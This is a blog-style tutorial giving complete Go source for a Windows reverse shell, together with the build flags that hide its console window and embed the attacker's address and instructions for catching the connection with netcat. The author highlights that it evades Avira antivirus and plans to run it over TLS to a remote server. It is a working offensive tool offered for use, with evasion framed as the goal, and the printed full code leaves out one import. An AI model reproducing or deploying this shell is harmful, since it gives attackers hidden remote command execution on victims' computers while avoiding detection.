Basic reverse shell in golang (almost undetectable, hide cmd window)
I found it on sysdream.com
First, what is a reverse shell :
Also called reverse tunnel is a computer technique that allows to redirect on a local computer the input and output of a shell to a remote computer, through a service able to interact between the two computers. One of the advantages of this technique is to make a local shell accessible from the remote server without being blocked by a firewall
Let’s code it
package mainimport ( "net" "os" "os/exec" "syscall"
)
- net is required to establish a connection
- os is required to call os.Exit()
- os/exec is required to execute command on the target machine
- syscall contains an interface to the low-level operating system primitives
var connectString stringfunc main() {if len(connectString) == 0 {os.Exit(1)}
- var connectString string will be set during the compilation, it is the ip address and the port
conn, err := net.Dial("tcp", connectString)if err != nil {os.Exit(1)}
- net.Dial connects to the address on the named network, in our case it will be the values into the variable connectString
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}- cmd := exec.Command(“cmd.exe”) cmd represents an external command being prepared or run, exec.Command execute the command cmd.exe
- cmd.SysProcAttr we use it to hide the cmd.exe window, this is the key to hide our reverse shell, we will need something else during the compilation !
cmd.Stdin = conncmd.Stdout = conncmd.Stderr = conn
- Redirection of the inputs and outputs of this process
to the open connection we initialized above into the “conn” variable.
cmd.Run()- cmd.Run() we run the command into the cmd variable
Here is the full code !
package mainimport (
"net"
"os"
"os/exec"
)var connectString stringfunc main() {if len(connectString) == 0 {
os.Exit(1)
}conn, err := net.Dial("tcp", connectString)
if err != nil {
os.Exit(1)
}cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conncmd.Run()}
Now we can compile it, your ip address (the ip of your hacking box to receive the connection) , in my case it’s 192.168.1.32 because i am on my local network, we use the port 2233 because it is not used but you can use any free ports the target machine :
go build --ldflags "-H=windowsgui -X main.connectString=192.168.1.32:2233" reverse.go- ldflags change the value of variables at build time and introduce your own dynamic information into a binary
- -H=windowsgui writes a “GUI binary” instead of a “console binary”
- -X flag to write information into the variable at link time, followed by the package path to the variable and its new value
So, let’s give a try on a windows VM and your Fav Linux Distrib.
How you can see i use avira as a ANTIVIRUS
You can use Netcat to listen on the port 2233 to receive the connection :
Now drag and drop the reverse.exe file and double click on it, nothing append from the target view:
If make a get-process to see if the reverse.exe is running you will see that he his running there is no problem at all, Avira did not detect anything !
Now we can take a look to our Netcat :
We have a shell, you can now play with it !!
As i said he his almost undetectable.
In a near futur i will make the cmd open in the background and do much more like connect it to a VPS with a TLS crypted connection to try it in real condition, you can do much more by looking at the author of this code on :
Signed Alix.
